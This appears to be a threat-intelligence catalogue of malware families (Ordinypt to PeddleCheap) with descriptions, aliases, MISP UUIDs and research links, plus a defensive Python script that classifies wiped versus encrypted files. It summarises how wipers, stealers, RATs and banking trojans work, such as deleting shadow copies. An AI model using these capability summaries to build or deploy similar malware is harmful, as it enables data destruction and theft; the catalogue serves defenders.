- http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/ - webarchive
- https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/ - webarchive
- https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/ - webarchive
- https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors - webarchive
- https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html - webarchive
- https://asec.ahnlab.com/en/45462/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ordinypt
This malware claims to be ransomware, but it is actually a wiper. After execution it terminates a number of processes, such as database processes, likely to release any files those programs held open. Ordinypt avoids wiping certain files and folders so that the infected machine does not become unusable. Affected files are overwritten with null bytes and receive a random 5-character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in records the file extension used on that specific machine, as well as which Bitcoin address was randomly presented to the victim for payment (drawn from a long list stored in the ransomware configuration).
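The distinction the entry draws, a wiper dressed up as ransomware, is the first thing to settle during triage, because it decides whether paying or waiting for a decryptor can help at all. The following is an added example, not code from Malpedia or from any of the Ordinypt reports: a small check that looks at files carrying a random five-character extension and classifies their contents. Genuinely encrypted data is close to uniformly random (entropy near 8 bits per byte), whereas Ordinypt-style overwriting leaves nothing but null bytes. The sample files, the extension pattern and the entropy threshold are constructed assumptions for illustration.

```python
"""
Added example (not Ordinypt analysis code): wiper-vs-ransomware triage by file content.
"""
import math
import os
import re
from collections import Counter
from typing import Dict, Tuple

# Assumption: a five-character alphanumeric extension appended after the original name.
RANDOM_EXT = re.compile(r"^.+\.[A-Za-z0-9]{5}$")
HIGH_ENTROPY_BITS = 7.5  # assumed threshold; random/encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, close to 8.0 for random or encrypted data."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def classify(data: bytes) -> str:
    """Label a file body by what the overwrite actually did to it."""
    if not data:
        return "empty"
    if data.count(0) == len(data):
        return "wiped-nulls"      # Ordinypt-style: content destroyed, nothing to decrypt
    if shannon_entropy(data) > HIGH_ENTROPY_BITS:
        return "high-entropy"     # consistent with real encryption (or compression)
    return "plaintext-like"


def triage_samples(samples: Dict[str, bytes]) -> Dict[str, Tuple[bool, str]]:
    """Return {name: (has_random_extension, classification)} for in-memory samples."""
    return {name: (bool(RANDOM_EXT.match(name)), classify(body)) for name, body in samples.items()}


def triage_directory(root: str) -> Dict[str, Tuple[bool, str]]:
    """Same check over files on disk; only the first 1 MiB of each file is examined."""
    results: Dict[str, Tuple[bool, str]] = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                results[path] = (bool(RANDOM_EXT.match(fname)), classify(fh.read(1 << 20)))
    return results


def wiper_verdict(results: Dict[str, Tuple[bool, str]]) -> str:
    """If every renamed file is all nulls, treat the incident as a wiper, not ransomware."""
    renamed = [cls for (has_ext, cls) in results.values() if has_ext]
    if not renamed:
        return "no-renamed-files"
    if all(cls == "wiped-nulls" for cls in renamed):
        return "wiper"
    if all(cls == "high-entropy" for cls in renamed):
        return "ransomware-like"
    return "mixed"


# Constructed samples standing in for files found on an affected host.
SAMPLES = {
    "report.docx.Kq7Zx": b"\x00" * 4096,
    "budget.xlsx.A9bT2": b"\x00" * 1024,
    "notes.txt": b"quarterly figures, see attached\n",
}

if __name__ == "__main__":
    verdicts = triage_samples(SAMPLES)
    for name, (has_ext, cls) in verdicts.items():
        print(f"{name:22} renamed={has_ext} class={cls}")
    print("verdict:", wiper_verdict(verdicts))
```

Two caveats when running this against a real host: the extension pattern also matches legitimate five-letter extensions, so the verdict should rest on the content classification rather than the rename alone, and a "wiper" result means the shadow copies and startup repair mentioned above are the only recovery paths worth checking, which Ordinypt also disables.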
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ordinypt.
Known Synonyms |
---|
GermanWiper |
HSDFSDCrypt |
Internal MISP references
UUID 7fd96553-4c78-43de-824f-82645ed4fac5
which can be used as unique global reference for Ordinypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html - webarchive
- https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/ - webarchive
- https://www.gdata.de/blog/2017/11/30151-ordinypt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OriginBot
OriginBot is a modular information stealer which can also download and execute other malicious payloads.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OriginBot.
Known Synonyms |
---|
OriginBotnet |
OriginLoader |
Internal MISP references
UUID 1a2ae63f-323f-4ff7-b465-484f1e87fca4
which can be used as unique global reference for OriginBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OriginLogger
Internal MISP references
UUID c1680c8e-c2e2-4975-82ad-8829b3918d70
which can be used as unique global reference for OriginLogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ORPCBackdoor
Internal MISP references
UUID 27c09b74-6e1e-4567-ae10-75eee3395c36
which can be used as unique global reference for ORPCBackdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor - webarchive
- https://medium.com/@knownsec404team/apt-k-47-mysterious-elephant-a-new-apt-organization-in-south-asia-5c66f954477 - webarchive
- https://medium.com/@knownsec404team/apt-k-47-organization-launches-espionage-attacks-using-a-new-trojan-tool-5e7eccfdce2f - webarchive
- https://paper.seebug.org/3117/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oski Stealer
Oski is a stealer written in C++ that appeared around November 2019 and is sold for between $70 and $100 on Russian-speaking forums. It collects different types of data (cryptocurrency wallets, saved passwords, files matching an attacker-defined pattern, etc.) and exfiltrates them in a zip file uploaded to the attacker's panel.
Internal MISP references
UUID 414d8e68-77e7-4157-936a-d70d80e5efc0
which can be used as unique global reference for Oski Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.oski - webarchive
- https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/ - webarchive
- https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer - webarchive
- https://3xp0rt.com/posts/mars-stealer - webarchive
- https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become - webarchive
- https://twitter.com/albertzsigovits/status/1160874557454131200 - webarchive
- https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601 - webarchive
- https://cyberint.com/blog/research/mars-stealer/ - webarchive
- https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view - webarchive
- https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/ - webarchive
- https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Osno
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Osno.
Known Synonyms |
---|
Babax |
Internal MISP references
UUID e2be4da9-0a8f-45a5-a69b-7f16acb39398
which can be used as unique global reference for Osno
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ousaban
Internal MISP references
UUID 6620c7ce-63a2-48db-a584-4c5c516bda13
which can be used as unique global reference for Ousaban
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban - webarchive
- https://www.netskope.com/blog/ousaban-latam-banking-malware-abusing-cloud-services - webarchive
- https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/ - webarchive
- https://www.atomicmatryoshka.com/post/ousaban-msi-installer-analysis - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OutCrypt
Ransomware.
Internal MISP references
UUID 90e5a21a-c058-47a0-aa4d-bffde7ba698e
which can be used as unique global reference for OutCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Outlook Backdoor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Outlook Backdoor.
Known Synonyms |
---|
FACADE |
Internal MISP references
UUID 10a521e4-b3b9-4feb-afce-081531063e7b
which can be used as unique global reference for Outlook Backdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf - webarchive
- https://twitter.com/VK_Intel/status/1085820673811992576 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OutSteel
According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.
Internal MISP references
UUID d2aab7c9-b83a-4889-9fae-c495ec4d324d
which can be used as unique global reference for OutSteel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Overlay RAT
Internal MISP references
UUID 842687f5-91bc-4719-ac3f-4166ae02e0cd
which can be used as unique global reference for Overlay RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OvidiyStealer
Internal MISP references
UUID 30d49b12-0dca-4652-9f7a-4d0cf7555375
which can be used as unique global reference for OvidiyStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
owaauth
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular owaauth.
Known Synonyms |
---|
luckyowa |
Internal MISP references
UUID 37f66fcc-e093-4d97-902d-c96602a7d234
which can be used as unique global reference for owaauth
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Owlproxy
Internal MISP references
UUID 7a6d97a2-821f-4083-9180-3f70a851ad5e
which can be used as unique global reference for Owlproxy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf - webarchive
- https://securelist.com/the-sessionmanager-iis-backdoor/106868/ - webarchive
- https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20 - webarchive
- https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Owowa
Kaspersky describes this as an OWA add-on with credential-stealing capabilities.
Internal MISP references
UUID aa985bc5-92e4-43c6-a01b-1de02818cfc9
which can be used as unique global reference for Owowa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OxtaRAT
Internal MISP references
UUID a5b379c0-7934-4a50-9a34-7ad1524b1fb0
which can be used as unique global reference for OxtaRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OZH RAT
Internal MISP references
UUID c9eefa23-4881-490f-abff-c78fe0c165ff
which can be used as unique global reference for OZH RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ozone RAT
Internal MISP references
UUID 4e319700-9350-4656-91f5-0b495af4e8ad
which can be used as unique global reference for Ozone RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ozone - webarchive
- https://www.fortinet.com/blog/threat-research/german-speakers-targeted-by-spam-leading-to-ozone-rat.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PadCrypt
Internal MISP references
UUID c21335f5-b145-4029-b1bc-161362c7ce80
which can be used as unique global reference for PadCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
paladin
Paladin RAT is a variant of Gh0st RAT used by PittyPanda, active since at least 2011.
Internal MISP references
UUID c6728a76-f4d9-4c49-a3aa-be895df13a35
which can be used as unique global reference for paladin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PandaBanker
According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan. Fox-IT discovered it in February 2016.
This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate actions on online banking portals.
The base config (C2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the C2 with further information on where to fetch the webinjects and additional modules, such as VNC, backsocks and grabber.
Panda does have a DGA implemented, but according to Arbor a bug prevents it from being used.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PandaBanker.
Known Synonyms |
---|
ZeusPanda |
Internal MISP references
UUID 31ebe294-f125-4cf3-95cc-f4150ab23303
which can be used as unique global reference for PandaBanker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker - webarchive
- https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf - webarchive
- https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847 - webarchive
- http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/ - webarchive
- https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html - webarchive
- https://www.youtube.com/watch?v=J7VOfAJvxEY - webarchive
- http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html - webarchive
- https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware - webarchive
- https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media - webarchive
- https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/ - webarchive
- https://www.spamhaus.org/news/article/771/ - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Panda Stealer
According to PCrisk, Panda is a malicious program classified as a stealer. It is a new variant of CollectorStealer.
The aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.
It has been observed being actively distributed via spam campaigns, large-scale operations in which thousands of scam emails are sent. The spam proliferating Panda Stealer heavily targeted users in the United States, Germany, Japan and Australia.
The deceptive emails used business-related lures (e.g. fake product quote requests). Panda Stealer is a dangerous program, and its infections must be removed immediately upon detection.
Internal MISP references
UUID 7fa924a9-4d7a-406c-b298-bf3b01557ac8
which can be used as unique global reference for Panda Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pandora
Pandora ransomware was obtained by vx-underground on 2022-03-14.
Internal MISP references
UUID e43b67bc-3c16-4a69-b63d-f6bf3d732e1b
which can be used as unique global reference for Pandora
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://dissectingmalwa.re/blog/pandora/ - webarchive
- https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box - webarchive
- https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/ - webarchive
- https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pandora RAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pandora RAT.
Known Synonyms |
---|
Pandora hVNC RAT |
Internal MISP references
UUID db259f3d-b8a1-44d4-8c4d-15bfea2a0c59
which can be used as unique global reference for Pandora RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://github.com/AZMagic/Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx - webarchive
- https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Paradies Clipper
Internal MISP references
UUID dd1bb757-6084-408a-8090-4e2bf0834c09
which can be used as unique global reference for Paradies Clipper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Paradise
Ransomware.
Internal MISP references
UUID 4f7e7602-79f8-4eea-8239-fb2d4ceadb9f
which can be used as unique global reference for Paradise
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise - webarchive
- https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool - webarchive
- https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/ - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/ - webarchive
- https://asec.ahnlab.com/en/47590/ - webarchive
- https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html - webarchive
- https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/ - webarchive
- https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Parallax RAT
Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous "coronamalware" campaigns: the attackers abused COVID-19 pandemic news to lure victims into opening themed emails that spread Parallax.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Parallax RAT.
Known Synonyms |
---|
ParallaxRAT |
Internal MISP references
UUID 39f74f33-467e-47a4-bd2f-e0a191dee9ca
which can be used as unique global reference for Parallax RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax - webarchive
- https://threatpost.com/ta2541-apt-rats-aviation/178422/ - webarchive
- https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/ - webarchive
- https://twitter.com/malwrhunterteam/status/1227196799997431809 - webarchive
- https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html - webarchive
- https://blog.morphisec.com/parallax-rat-active-status - webarchive
- https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration - webarchive
- https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/ - webarchive
- https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
parasite_http
Internal MISP references
UUID c5eee19f-0877-4709-86ea-328e346af1bf
which can be used as unique global reference for parasite_http
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PartyTicket
PartyTicket is ransomware written in Go, which Zscaler described as poorly designed. According to Brett Stone-Gross, this malware is likely intended as a diversion from the HermeticWiper (aka KillDisk.NCV, DriveSlayer) attack.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PartyTicket.
Known Synonyms |
---|
Elections GoRansom |
HermeticRansom |
SonicVote |
Internal MISP references
UUID 697d905a-5353-43ed-97e0-15f7d2763b69
which can be used as unique global reference for PartyTicket
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket - webarchive
- https://www.brighttalk.com/webcast/15591/534324 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ - webarchive
- https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine - webarchive
- https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/ - webarchive
- https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.mandiant.com/resources/information-operations-surrounding-ukraine - webarchive
- https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ - webarchive
- https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Passlock
Ransomware.
Internal MISP references
UUID 1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8
which can be used as unique global reference for Passlock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pay2Key
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pay2Key.
Known Synonyms |
---|
Cobalt |
Internal MISP references
UUID 46dc64c6-e927-44fc-b4a4-efd1677ae030
which can be used as unique global reference for Pay2Key
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://twitter.com/TrendMicroRSRCH/status/1389422784808378370 - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf - webarchive
- https://research.checkpoint.com/2020/ransomware-alert-pay2key/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PayloadBIN
Internal MISP references
UUID 313c81ab-fba2-4577-8de6-863515a65c45
which can be used as unique global reference for PayloadBIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PcShare
PcShare is an open-source backdoor that has been seen modified and used by Chinese threat actors, mainly against countries in South East Asia.
Internal MISP references
UUID 42100d7e-39c7-47c0-bc9e-3c590ed0d837
which can be used as unique global reference for PcShare
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
- https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PEBBLEDASH
Internal MISP references
UUID d6da9699-778c-4c97-82f4-1e9113283bd4
which can be used as unique global reference for PEBBLEDASH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash - webarchive
- https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ - webarchive
- https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf - webarchive
- https://asec.ahnlab.com/en/30532/ - webarchive
- https://asec.ahnlab.com/en/59590/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-133c - webarchive
- https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1 - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf - webarchive
- https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2 - webarchive
- https://asec.ahnlab.com/en/30022/ - webarchive
- https://blog.reversinglabs.com/blog/hidden-cobra - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PeddleCheap
PeddleCheap is a module of the DanderSpritz framework which surfaced with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they had found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.
Internal MISP references
UUID ee450087-00e4-4b59-9ea7-6650d5551ea9
